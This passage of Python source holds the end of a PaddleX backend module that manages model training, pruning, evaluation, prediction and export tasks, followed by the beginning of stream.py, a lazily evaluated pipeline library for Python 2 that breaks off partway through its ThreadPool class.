transforms=model.test_transforms)
eval_dataset = pdx.datasets.CocoDetection(
data_dir=osp.join(dataset_path, 'JPEGImages'),
ann_file=val_json,
transforms=model.eval_transforms)
elif task_type == "segmentation":
train_file_list = osp.join(dataset_path, 'train_list.txt')
val_file_list = osp.join(dataset_path, 'val_list.txt')
label_list = osp.join(dataset_path, 'labels.txt')
quant_dataset = pdx.datasets.SegDataset(
data_dir=dataset_path,
file_list=train_file_list,
label_list=label_list,
transforms=model.test_transforms)
eval_dataset = pdx.datasets.SegDataset(
data_dir=dataset_path,
file_list=val_file_list,
label_list=label_list,
transforms=model.eval_transforms)
metric_before = model.evaluate(eval_dataset)
pdx.log_level = 3
pdx.slim.export_quant_model(
model, quant_dataset, batch_size=1, save_dir=save_dir, cache_dir=None)
model_quant = pdx.load_model(save_dir)
metric_after = model_quant.evaluate(eval_dataset)
metrics = {}
if task_type == "segmentation":
metrics['before'] = {'miou': metric_before['miou']}
metrics['after'] = {'miou': metric_after['miou']}
else:
metrics['before'] = metric_before
metrics['after'] = metric_after
import json
with open(
osp.join(export_status_path, 'quant_result.json'),
'w',
encoding='utf-8') as f:
json.dump(metrics, f)
set_folder_status(export_status_path, TaskStatus.XEXPORTED)
set_folder_status(task_path, TaskStatus.XEXPORTED)
def _call_paddlelite_export_lite(model_path, save_dir=None, place="arm"):
import paddlelite.lite as lite
opt = lite.Opt()
model_file = os.path.join(model_path, '__model__')
params_file = os.path.join(model_path, '__params__')
if save_dir is None:
save_dir = osp.join(model_path, "lite_model")
if not osp.exists(save_dir):
os.makedirs(save_dir)
path = osp.join(save_dir, "model")
opt.run_optimize("", model_file, params_file, "naive_buffer", place, path)
def safe_clean_folder(folder):
if osp.exists(folder):
try:
shutil.rmtree(folder)
os.makedirs(folder)
except Exception as e:
pass
if osp.exists(folder):
for root, dirs, files in os.walk(folder):
for name in files:
try:
os.remove(os.path.join(root, name))
except Exception as e:
pass
else:
os.makedirs(folder)
else:
os.makedirs(folder)
if not osp.exists(folder):
os.makedirs(folder)
def get_task_max_saved_epochs(task_path):
saved_epoch_num = -1
output_path = osp.join(task_path, "output")
if osp.exists(output_path):
for f in os.listdir(output_path):
if f.startswith("epoch_"):
if not osp.exists(osp.join(output_path, f, '.success')):
continue
curr_epoch_num = int(f[6:])
if curr_epoch_num > saved_epoch_num:
saved_epoch_num = curr_epoch_num
return saved_epoch_num
def get_task_status(task_path):
status, message = get_folder_status(task_path, True)
task_id = os.path.split(task_path)[-1]
err_log = os.path.join(task_path, 'err.log')
if status in [TaskStatus.XTRAINING, TaskStatus.XPRUNETRAIN]:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XTRAINFAIL
message = "训练任务{}异常终止,请查阅错误日志具体确认原因{}。\n\n 如若通过日志无法确定原因,可尝试以下几种方法,\n" \
"1. 尝试重新启动训练,看是否能正常训练; \n" \
"2. 调低batch_size(需同时按比例调低学习率等参数)排除是否是显存或内存不足的原因导致;\n" \
"3. 前往GitHub提ISSUE,描述清楚问题会有工程师及时回复: https://github.com/PaddlePaddle/PaddleX/issues ; \n" \
"3. 加QQ群1045148026或邮件至paddlex@baidu.com在线咨询工程师".format(task_id, err_log)
set_folder_status(task_path, status, message)
return status, message
def train_model(task_path):
"""训练模型
Args:
task_path(str): 模型训练的参数保存在task_path下的'params.pkl'文件中
"""
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
sensitivities_path = params['train'].sensitivities_path
p = mp.Process(target=_call_paddlex_train, args=(task_path, params))
p.start()
if sensitivities_path is None:
set_folder_status(task_path, TaskStatus.XTRAINING, p.pid)
else:
set_folder_status(task_path, TaskStatus.XPRUNETRAIN, p.pid)
return p
def stop_train_model(task_path):
"""停止正在训练的模型
Args:
task_path(str): 从task_path下的'XTRANING'文件中获取训练的进程id
"""
status, message = get_task_status(task_path)
if status in [TaskStatus.XTRAINING, TaskStatus.XPRUNETRAIN]:
pid = int(message)
pkill(pid)
best_model_saved = True
if not osp.exists(osp.join(task_path, 'output', 'best_model')):
best_model_saved = False
set_folder_status(task_path, TaskStatus.XTRAINEXIT, best_model_saved)
else:
raise Exception("模型训练任务没在运行中")
def prune_analysis_model(task_path):
"""模型裁剪分析
Args:
task_path(str): 模型训练的参数保存在task_path
dataset_path(str) 模型裁剪中评估数据集的路径
"""
best_model_path = osp.join(task_path, 'output', 'best_model')
assert osp.exists(best_model_path), "该任务暂未保存模型,无法进行模型裁剪分析"
prune_analysis_path = osp.join(task_path, 'prune')
if not osp.exists(prune_analysis_path):
os.makedirs(prune_analysis_path)
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
assert params['train'].model.lower() not in [
"fasterrcnn", "maskrcnn"
], "暂不支持FasterRCNN、MaskRCNN模型裁剪"
p = mp.Process(
target=_call_paddle_prune,
args=(best_model_path, prune_analysis_path, params))
p.start()
set_folder_status(prune_analysis_path, PruneStatus.XSPRUNEING, p.pid)
set_folder_status(task_path, TaskStatus.XPRUNEING, p.pid)
return p
def get_prune_status(prune_path):
status, message = get_folder_status(prune_path, True)
if status in [PruneStatus.XSPRUNEING]:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PruneStatus.XSPRUNEFAIL
message = "模型裁剪异常终止,可能原因如下:\n1.暂不支持FasterRCNN、MaskRCNN模型的模型裁剪\n2.模型裁剪过程中进程被异常结束,建议重新启动模型裁剪任务"
set_folder_status(prune_path, status, message)
return status, message
def stop_prune_analysis(prune_path):
"""停止正在裁剪分析的模型
Args:
prune_path(str): prune_path'XSSLMING'文件中获取训练的进程id
"""
status, message = get_prune_status(prune_path)
if status == PruneStatus.XSPRUNEING:
pid = int(message)
pkill(pid)
set_folder_status(prune_path, PruneStatus.XSPRUNEEXIT)
else:
raise Exception("模型裁剪分析任务未在运行中")
def evaluate_model(task_path,
task_type,
epoch=None,
topk=5,
score_thresh=0.3,
overlap_thresh=0.5):
"""评估最优模型
Args:
task_path(str): 模型训练相关结果的保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,无法进行评估".format(output_path))
evaluate_status_path = osp.join(task_path, 'logs/evaluate')
safe_clean_folder(evaluate_status_path)
if epoch is None:
model_path = osp.join(output_path, 'best_model')
else:
epoch_dir = "{}_{}".format('epoch', epoch)
model_path = osp.join(output_path, epoch_dir)
p = mp.Process(
target=_call_paddlex_evaluate_model,
args=(task_path, model_path, task_type, epoch, topk, score_thresh,
overlap_thresh))
p.start()
set_folder_status(evaluate_status_path, TaskStatus.XEVALUATING, p.pid)
return p
def get_evaluate_status(task_path):
"""获取导出状态
Args:
task_path(str): 训练任务文件夹
"""
evaluate_status_path = osp.join(task_path, 'logs/evaluate')
if not osp.exists(evaluate_status_path):
return None, "No evaluate fold in path {}".format(task_path)
status, message = get_folder_status(evaluate_status_path, True)
if status == TaskStatus.XEVALUATING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEVALUATEFAIL
message = "评估过程出现异常,请尝试重新评估!"
set_folder_status(evaluate_status_path, status, message)
if status not in [
TaskStatus.XEVALUATING, TaskStatus.XEVALUATED,
TaskStatus.XEVALUATEFAIL
]:
raise ValueError("Wrong status in evaluate task {}".format(status))
return status, message
def get_predict_status(task_path):
"""获取预测任务状态
Args:
task_path(str): 从predict_path下的'XPRESTART'文件中获取训练的进程id
"""
from ..utils import list_files
predict_status_path = osp.join(task_path, "logs/predict")
save_dir = osp.join(task_path, "visualized_test_results")
if not osp.exists(save_dir):
return None, "任务目录下没有visualized_test_results文件夹,{}".format(
task_path), 0, 0
status, message = get_folder_status(predict_status_path, True)
if status == PredictStatus.XPRESTART:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PredictStatus.XPREFAIL
message = "图片预测过程出现异常,请尝试重新预测!"
set_folder_status(predict_status_path, status, message)
if status not in [
PredictStatus.XPRESTART, PredictStatus.XPREDONE,
PredictStatus.XPREFAIL
]:
raise ValueError("预测任务状态异常,{}".format(status))
predict_num = len(list_files(save_dir))
if predict_num > 0:
if predict_num == 1:
total_num = 1
else:
total_num = int(
open(
osp.join(predict_status_path, "total_num"),
encoding='utf-8').readline().strip())
else:
predict_num = 0
total_num = 0
return status, message, predict_num, total_num
def predict_test_pics(task_path,
img_list=[],
img_data=None,
save_dir=None,
score_thresh=0.5,
epoch=None):
"""模型预测
Args:
task_path(str): 模型训练的参数保存在task_path下的'params.pkl'文件中
"""
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
predict_status_path = osp.join(task_path, "logs/predict")
safe_clean_folder(predict_status_path)
save_dir = osp.join(task_path, 'visualized_test_results')
safe_clean_folder(save_dir)
p = mp.Process(
target=_call_paddlex_predict,
args=(task_path, predict_status_path, params, img_list, img_data,
save_dir, score_thresh, epoch))
p.start()
set_folder_status(predict_status_path, PredictStatus.XPRESTART, p.pid)
return p, save_dir
def stop_predict_task(task_path):
"""停止预测任务
Args:
task_path(str): 从predict_path下的'XPRESTART'文件中获取训练的进程id
"""
from ..utils import list_files
predict_status_path = osp.join(task_path, "logs/predict")
save_dir = osp.join(task_path, "visualized_test_results")
if not osp.exists(save_dir):
return None, "任务目录下没有visualized_test_results文件夹,{}".format(
task_path), 0, 0
status, message = get_folder_status(predict_status_path, True)
if status == PredictStatus.XPRESTART:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = PredictStatus.XPREFAIL
message = "图片预测过程出现异常,请尝试重新预测!"
set_folder_status(predict_status_path, status, message)
else:
pkill(pid)
status = PredictStatus.XPREFAIL
message = "图片预测进程已停止!"
set_folder_status(predict_status_path, status, message)
if status not in [
PredictStatus.XPRESTART, PredictStatus.XPREDONE,
PredictStatus.XPREFAIL
]:
raise ValueError("预测任务状态异常,{}".format(status))
predict_num = len(list_files(save_dir))
if predict_num > 0:
total_num = int(
open(
osp.join(predict_status_path, "total_num"), encoding='utf-8')
.readline().strip())
else:
predict_num = 0
total_num = 0
return status, message, predict_num, total_num
def get_export_status(task_path):
"""获取导出状态
Args:
task_path(str): 从task_path下的'export/XEXPORTING'文件中获取训练的进程id
Return:
导出的状态和其他消息.
"""
export_status_path = osp.join(task_path, 'logs/export')
if not osp.exists(export_status_path):
return None, "{}任务目录下没有export文件夹".format(task_path)
status, message = get_folder_status(export_status_path, True)
if status == TaskStatus.XEXPORTING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEXPORTFAIL
message = "导出过程出现异常,请尝试重新评估!"
set_folder_status(export_status_path, status, message)
if status not in [
TaskStatus.XEXPORTING, TaskStatus.XEXPORTED, TaskStatus.XEXPORTFAIL
]:
# raise ValueError("获取到的导出状态异常,{}。".format(status))
return None, "获取到的导出状态异常,{}。".format(status)
return status, message
def export_quant_model(task_path, save_dir, epoch=None):
"""导出量化模型
Args:
task_path(str): 模型训练的路径
save_dir(str): 导出后的模型保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,导出失败".format(output_path))
export_status_path = osp.join(task_path, 'logs/export')
safe_clean_folder(export_status_path)
params_conf_file = osp.join(task_path, 'params.pkl')
assert osp.exists(
params_conf_file), "任务无法启动,路径{}下不存在参数配置文件params.pkl".format(task_path)
with open(params_conf_file, 'rb') as f:
params = pickle.load(f)
p = mp.Process(
target=_call_paddlex_export_quant,
args=(task_path, params, save_dir, export_status_path, epoch))
p.start()
set_folder_status(export_status_path, TaskStatus.XEXPORTING, p.pid)
set_folder_status(task_path, TaskStatus.XEXPORTING, p.pid)
return p
def export_noquant_model(task_path, save_dir, epoch=None):
"""导出inference模型
Args:
task_path(str): 模型训练的路径
save_dir(str): 导出后的模型保存路径
"""
output_path = osp.join(task_path, 'output')
if not osp.exists(osp.join(output_path, 'best_model')):
raise Exception("未在训练路径{}下发现保存的best_model,导出失败".format(output_path))
export_status_path = osp.join(task_path, 'logs/export')
safe_clean_folder(export_status_path)
p = mp.Process(
target=_call_paddlex_export_infer,
args=(task_path, save_dir, export_status_path, epoch))
p.start()
set_folder_status(export_status_path, TaskStatus.XEXPORTING, p.pid)
set_folder_status(task_path, TaskStatus.XEXPORTING, p.pid)
return p
def opt_lite_model(model_path, save_dir=None, place='arm'):
p = mp.Process(
target=_call_paddlelite_export_lite,
args=(model_path, save_dir, place))
p.start()
p.join()
def stop_export_task(task_path):
"""停止导出
Args:
task_path(str): 从task_path下的'export/XEXPORTING'文件中获取训练的进程id
Return:
the export status and message.
"""
export_status_path = osp.join(task_path, 'logs/export')
if not osp.exists(export_status_path):
return None, "{}任务目录下没有export文件夹".format(task_path)
status, message = get_folder_status(export_status_path, True)
if status == TaskStatus.XEXPORTING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEXPORTFAIL
message = "导出过程出现异常,请尝试重新评估!"
set_folder_status(export_status_path, status, message)
else:
pkill(pid)
status = TaskStatus.XEXPORTFAIL
message = "已停止导出进程!"
set_folder_status(export_status_path, status, message)
if status not in [
TaskStatus.XEXPORTING, TaskStatus.XEXPORTED, TaskStatus.XEXPORTFAIL
]:
raise ValueError("获取到的导出状态异常,{}。".format(status))
return status, message
|
stream.py
|
"""Lazily-evaluated, parallelizable pipeline.
Overview
========
Streams are iterables with a pipelining mechanism to enable
data-flow programming and easy parallelization.
The idea is to take the output of a function that turn an iterable into
another iterable and plug that as the input of another such function.
While you can already do this using function composition, this package
provides an elegant notation for it by overloading the '>>' operator.
This approach focuses the programming on processing streams of data, step
by step. A pipeline usually starts with a producer, then passes through
a number of filters. Multiple streams can be branched and combined.
Finally, the output is fed to an accumulator, which can be any function
of one iterable argument.
Producers: anything iterable
+ from this module: seq, gseq, repeatcall, chaincall
Filters:
+ by index: take, drop, takei, dropi
+ by condition: filter, takewhile, dropwhile
+ by transformation: apply, map, fold
+ by combining streams: prepend, tee
+ for special purpose: chop, cut, flatten
Accumulators: item, maximum, minimum, reduce
+ from Python: list, sum, dict, max, min ...
Values are computed only when an accumulator forces some or all evaluation
(not when the stream are set up).
Parallelization
===============
All parts of a pipeline can be parallelized using multiple threads or processes.
When a producer is doing blocking I/O, it is possible to use a ThreadedFeeder
or ForkedFeeder to improve performance. The feeder will start a thread or a
process to run the producer and feed generated items back to the pipeline, thus
minimizing the time that the whole pipeline has to wait when the producer is
blocking in system calls.
If the order of processing does not matter, an ThreadPool or ProcessPool
can be used. They both utilize a number of workers in other theads
or processes to work on items pulled from the input stream. Their output
are simply iterables respresented by the pool objects which can be used in
pipelines. Alternatively, an Executor can perform fine-grained, concurrent job
control over a thread/process pool.
Multiple streams can be piped to a single PCollector or QCollector, which
will gather generated items whenever they are avaiable. PCollectors
can collect from ForkedFeeder's or ProcessPool's (via system pipes) and
QCollector's can collect from ThreadedFeeder's and ThreadPool's (via queues).
PSorter and QSorter are also collectors, but given multiples sorted input
streams (low to high), a Sorter will output items in sorted order.
Using multiples Feeder's and Collector's, one can implement many parallel
processing patterns: fan-in, fan-out, many-to-many map-reduce, etc.
Articles
========
Articles written about this module by the author can be retrieved from
<http://blog.onideas.ws/tag/project:stream.py>.
"""
from __future__ import with_statement
import __builtin__
import copy
import collections
import heapq
import itertools
import operator
import Queue
import re
import select
import sys
import threading
import time
from operator import itemgetter, attrgetter
zip = itertools.izip
try:
import multiprocessing
import multiprocessing.queues
_nCPU = multiprocessing.cpu_count()
except ImportError:
_nCPU = 1
try:
Iterable = collections.Iterable
except AttributeError:
Iterable = object
try:
next
except NameError:
def next(iterator):
return iterator.next()
try:
from operator import methodcaller
except ImportError:
def methodcaller(methodname, *args, **kwargs):
return lambda o: getattr(o, methodname)(*args, **kwargs)
__version__ = '0.8'
#_____________________________________________________________________
# Base class
class BrokenPipe(Exception):
pass
class Stream(Iterable):
"""A stream is both a lazy list and an iterator-processing function.
The lazy list is represented by the attribute 'iterator'.
The iterator-processing function is represented by the method
__call__(iterator), which should return a new iterator
representing the output of the Stream.
By default, __call__(iterator) chains iterator with self.iterator,
appending itself to the input stream in effect.
__pipe__(inpipe) defines the connection mechanism between Stream objects.
By default, it replaces self.iterator with the iterator returned by
__call__(iter(inpipe)).
A Stream subclass will usually implement __call__, unless it is an
accumulator and will not return a Stream, in which case it will need to
implement __pipe__.
The `>>` operator works as follow: the expression `a >> b` means
`b.__pipe__(a) if hasattr(b, '__pipe__') else b(a)`.
>>> [1, 2, 3] >> Stream([4, 5, 6]) >> list
[1, 2, 3, 4, 5, 6]
"""
def __init__(self, iterable=None):
"""Make a Stream object from an iterable."""
self.iterator = iter(iterable if iterable else [])
def __iter__(self):
return self.iterator
def __call__(self, iterator):
"""Append to the end of iterator."""
return itertools.chain(iterator, self.iterator)
def __pipe__(self, inpipe):
self.iterator = self.__call__(iter(inpipe))
return self
@staticmethod
def pipe(inpipe, outpipe):
"""Connect inpipe and outpipe. If outpipe is not a Stream instance,
it should be an function callable on an iterable.
"""
if hasattr(outpipe, '__pipe__'):
return outpipe.__pipe__(inpipe)
elif hasattr(outpipe, '__call__'):
return outpipe(inpipe)
else:
raise BrokenPipe('No connection mechanism defined')
def __rshift__(self, outpipe):
return Stream.pipe(self, outpipe)
def __rrshift__(self, inpipe):
return Stream.pipe(inpipe, self)
def extend(self, outpipe):
"""Similar to __pipe__, except that outpipe must be a Stream, in
which case self.iterator will be modified in-place by calling
outpipe.__call__ on it.
"""
self.iterator = outpipe.__call__(self.iterator)
return self
def __repr__(self):
return 'Stream(%s)' % repr(self.iterator)
#_______________________________________________________________________
# Process streams by element indices
class take(Stream):
"""Take the firts n items of the input stream, return a Stream.
>>> seq(1, 2) >> take(10)
Stream([1, 3, 5, 7, 9, 11, 13, 15, 17, 19])
"""
def __init__(self, n):
"""n: the number of elements to be taken"""
super(take, self).__init__()
self.n = n
self.items = []
def __call__(self, iterator):
self.items = list(itertools.islice(iterator, self.n))
return iter(self.items)
def __repr__(self):
return 'Stream(%s)' % repr(self.items)
negative = lambda x: x and x < 0 ### since None < 0 == True
class itemtaker(Stream):
"""Slice the input stream, return a list.
>>> i = itertools.count()
>>> i >> item[:10:2]
[0, 2, 4, 6, 8]
>>> i >> item[:5]
[10, 11, 12, 13, 14]
>>> xrange(20) >> item[::-2]
[19, 17, 15, 13, 11, 9, 7, 5, 3, 1]
"""
def __init__(self, key=None):
self.key = key
@staticmethod
def __getitem__(key):
if (type(key) is int) or (type(key) is slice):
return itemtaker(key)
else:
raise TypeError('key must be an integer or a slice')
def __pipe__(self, inpipe):
i = iter(inpipe)
if type(self.key) is int:
## just one item is needed
if self.key >= 0:
# throw away self.key items
collections.deque(itertools.islice(i, self.key), maxlen=0)
return next(i)
else:
# keep the last -self.key items
# since we don't know beforehand when the stream stops
n = -self.key if self.key else 1
items = collections.deque(itertools.islice(i, None), maxlen=n)
if items:
return items[-n]
else:
return []
else:
## a list is needed
if negative(self.key.stop) or negative(self.key.start) \
or not (self.key.start or self.key.stop) \
or (not self.key.start and negative(self.key.step)) \
or (not self.key.stop and not negative(self.key.step)):
# force all evaluation
items = [x for x in i]
else:
# force some evaluation
if negative(self.key.step):
stop = self.key.start
else:
stop = self.key.stop
items = list(itertools.islice(i, stop))
return items[self.key]
def __repr__(self):
return '<itemtaker at %s>' % hex(id(self))
item = itemtaker()
class takei(Stream):
"""Take elements of the input stream by indices.
>>> seq() >> takei(xrange(2, 43, 4)) >> list
[2, 6, 10, 14, 18, 22, 26, 30, 34, 38, 42]
"""
def __init__(self, indices):
"""indices: an iterable of indices to be taken, should yield
non-negative integers in monotonically increasing order
"""
super(takei, self).__init__()
self.indexiter = iter(indices)
def __call__(self, iterator):
def itaker():
old_idx = -1
idx = next(self.indexiter) # next value to yield
counter = seq()
while 1:
c = next(counter)
elem = next(iterator)
while idx <= old_idx: # ignore bad values
idx = next(self.indexiter)
if c == idx:
yield elem
old_idx = idx
idx = next(self.indexiter)
return itaker()
class drop(Stream):
"""Drop the first n elements of the input stream.
>>> seq(0, 2) >> drop(1) >> take(5)
Stream([2, 4, 6, 8, 10])
"""
def __init__(self, n):
"""n: the number of elements to be dropped"""
super(drop, self).__init__()
self.n = n
def __call__(self, iterator):
collections.deque(itertools.islice(iterator, self.n), maxlen=0)
return iterator
class dropi(Stream):
"""Drop elements of the input stream by indices.
>>> seq() >> dropi(seq(0,3)) >> item[:10]
[1, 2, 4, 5, 7, 8, 10, 11, 13, 14]
"""
def __init__(self, indices):
"""indices: an iterable of indices to be dropped, should yield
non-negative integers in monotonically increasing order
"""
super(dropi, self).__init__()
self.indexiter = iter(indices)
def __call__(self, iterator):
def idropper():
counter = seq()
def try_next_idx():
## so that the stream keeps going
## after the discard iterator is exhausted
try:
return next(self.indexiter), False
except StopIteration:
return -1, True
old_idx = -1
idx, exhausted = try_next_idx() # next value to discard
while 1:
c = next(counter)
elem = next(iterator)
while not exhausted and idx <= old_idx: # ignore bad values
idx, exhausted = try_next_idx()
if c != idx:
yield elem
elif not exhausted:
old_idx = idx
idx, exhausted = try_next_idx()
return idropper()
#_______________________________________________________________________
# Process streams with functions and higher-order ones
class Processor(Stream):
"""A decorator to turn an iterator-processing function into
a Stream processor object.
"""
def __init__(self, function):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
super(Processor, self).__init__()
self.function = function
def __call__(self, iterator):
return self.function(iterator)
class apply(Stream):
"""Invoke a function using each element of the input stream unpacked as
its argument list, a la itertools.starmap.
>>> vectoradd = lambda u,v: zip(u, v) >> apply(lambda x,y: x+y) >> list
>>> vectoradd([1, 2, 3], [4, 5, 6])
[5, 7, 9]
"""
def __init__(self, function):
"""function: to be called with each stream element unpacked as its
argument list
"""
super(apply, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.starmap(self.function, iterator)
class map(Stream):
"""Invoke a function using each element of the input stream as its only
argument, a la itertools.imap.
>>> square = lambda x: x*x
>>> range(10) >> map(square) >> list
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(map, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.imap(self.function, iterator)
class filter(Stream):
"""Filter the input stream, selecting only values which evaluates to True
by the given function, a la itertools.ifilter.
>>> even = lambda x: x%2 == 0
>>> range(10) >> filter(even) >> list
[0, 2, 4, 6, 8]
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(filter, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.ifilter(self.function, iterator)
class takewhile(Stream):
"""Take items from the input stream that come before the first item to
evaluate to False by the given function, a la itertools.takewhile.
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(takewhile, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.takewhile(self.function, iterator)
class dropwhile(Stream):
"""Drop items from the input stream that come before the first item to
evaluate to False by the given function, a la itertools.dropwhile.
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(dropwhile, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.dropwhile(self.function, iterator)
class fold(Stream):
"""Combines the elements of the input stream by applying a function of two
argument to a value and each element in turn. At each step, the value is
set to the value returned by the function, thus it is, in effect, an
accumulation.
Intermediate values are yielded (similar to Haskell `scanl`).
This example calculate partial sums of the series 1 + 1/2 + 1/4 +...
>>> gseq(0.5) >> fold(operator.add) >> item[:5]
[1, 1.5, 1.75, 1.875, 1.9375]
"""
def __init__(self, function, initval=None):
super(fold, self).__init__()
self.function = function
self.initval = initval
def __call__(self, iterator):
def folder():
if self.initval:
accumulated = self.initval
else:
accumulated = next(iterator)
while 1:
yield accumulated
val = next(iterator)
accumulated = self.function(accumulated, val)
return folder()
#_____________________________________________________________________
# Special purpose stream processors
class chop(Stream):
"""Chop the input stream into segments of length n.
>>> range(10) >> chop(3) >> list
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
"""
def __init__(self, n):
"""n: the length of the segments"""
super(chop, self).__init__()
self.n = n
def __call__(self, iterator):
def chopper():
while 1:
s = iterator >> item[:self.n]
if s:
yield s
else:
break
return chopper()
class itemcutter(map):
"""Slice each element of the input stream.
>>> [range(10), range(10, 20)] >> cut[::2] >> list
[[0, 2, 4, 6, 8], [10, 12, 14, 16, 18]]
"""
def __init__(self, *args):
super(itemcutter, self).__init__( methodcaller('__getitem__', *args) )
@classmethod
def __getitem__(cls, args):
return cls(args)
def __repr__(self):
return '<itemcutter at %s>' % hex(id(self))
cut = itemcutter()
class flattener(Stream):
"""Flatten a nested stream of arbitrary depth.
>>> (xrange(i) for i in seq(step=3)) >> flatten >> item[:18]
[0, 1, 2, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 4, 5, 6, 7, 8]
"""
@staticmethod
def __call__(iterator):
def flatten():
## Maintain a LIFO stack of iterators
stack = []
i = iterator
while True:
try:
e = next(i)
if hasattr(e, "__iter__") and not isinstance(e, basestring):
stack.append(i)
i = iter(e)
else:
yield e
except StopIteration:
try:
i = stack.pop()
except IndexError:
break
return flatten()
def __repr__(self):
return '<flattener at %s>' % hex(id(self))
flatten = flattener()
#_______________________________________________________________________
# Combine multiple streams
class prepend(Stream):
"""Inject values at the beginning of the input stream.
>>> seq(7, 7) >> prepend(xrange(0, 10, 2)) >> item[:10]
[0, 2, 4, 6, 8, 7, 14, 21, 28, 35]
"""
def __call__(self, iterator):
return itertools.chain(self.iterator, iterator)
class tee(Stream):
"""Make a T-split of the input stream.
>>> foo = filter(lambda x: x%3==0)
>>> bar = seq(0, 2) >> tee(foo)
>>> bar >> item[:5]
[0, 2, 4, 6, 8]
>>> foo >> item[:5]
[0, 6, 12, 18, 24]
"""
def __init__(self, named_stream):
"""named_stream: a Stream object toward which the split branch
will be piped.
"""
super(tee, self).__init__()
self.named_stream = named_stream
def __pipe__(self, inpipe):
branch1, branch2 = itertools.tee(iter(inpipe))
self.iterator = branch1
Stream.pipe(branch2, self.named_stream)
return self
#_____________________________________________________________________
# _iterqueue and _iterrecv
def _iterqueue(queue):
# Turn a either a threading.Queue or a multiprocessing.queues.SimpleQueue
# into an thread-safe iterator which will exhaust when StopIteration is
# put into it.
while 1:
item = queue.get()
if item is StopIteration:
# Re-broadcast, in case there is another listener blocking on
# queue.get(). That listener will receive StopIteration and
# re-broadcast to the next one in line.
try:
queue.put(StopIteration)
except IOError:
# Could happen if the Queue is based on a system pipe,
# and the other end was closed.
pass
break
else:
yield item
def _iterrecv(pipe):
# Turn a the receiving end of a multiprocessing.Connection object
# into an iterator which will exhaust when StopIteration is
# put into it. _iterrecv is NOT safe to use by multiple threads.
while 1:
try:
item = pipe.recv()
except EOFError:
break
else:
if item is StopIteration:
break
else:
yield item
#_____________________________________________________________________
# Threaded/forked feeder
class ThreadedFeeder(Iterable):
def __init__(self, generator, *args, **kwargs):
"""Create a feeder that start the given generator with
*args and **kwargs in a separate thread. The feeder will
act as an eagerly evaluating proxy of the generator.
The feeder can then be iter()'ed over by other threads.
This should improve performance when the generator often
blocks in system calls.
"""
self.outqueue = Queue.Queue()
def feeder():
i = generator(*args, **kwargs)
while 1:
try:
self.outqueue.put(next(i))
except StopIteration:
self.outqueue.put(StopIteration)
break
self.thread = threading.Thread(target=feeder)
self.thread.start()
def __iter__(self):
return _iterqueue(self.outqueue)
def join(self):
self.thread.join()
def __repr__(self):
return '<ThreadedFeeder at %s>' % hex(id(self))
class ForkedFeeder(Iterable):
def __init__(self, generator, *args, **kwargs):
"""Create a feeder that start the given generator with
*args and **kwargs in a child process. The feeder will
act as an eagerly evaluating proxy of the generator.
The feeder can then be iter()'ed over by other processes.
This should improve performance when the generator often
blocks in system calls. Note that serialization could
be costly.
"""
self.outpipe, inpipe = multiprocessing.Pipe(duplex=False)
def feed():
i = generator(*args, **kwargs)
while 1:
try:
inpipe.send(next(i))
except StopIteration:
inpipe.send(StopIteration)
break
self.process = multiprocessing.Process(target=feed)
self.process.start()
def __iter__(self):
return _iterrecv(self.outpipe)
def join(self):
self.process.join()
def __repr__(self):
return '<ForkedFeeder at %s>' % hex(id(self))
#_____________________________________________________________________
# Asynchronous stream processing using a pool of threads or processes
class ThreadPool(Stream):
"""Work on the input stream asynchronously using a pool of threads.
>>> range(10) >> ThreadPool(map(lambda x: x*x)) >> sum
285
The pool object is an iterable over the output values. If an
input value causes an Exception to be raised, the tuple (value,
exception) is put into the pool's `failqueue`. The attribute
`failure` is a thead-safe iterator over the `failqueue`.
See also: Executor
"""
def __init__(self, function, poolsize=_nCPU, args=[], kwargs={}):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
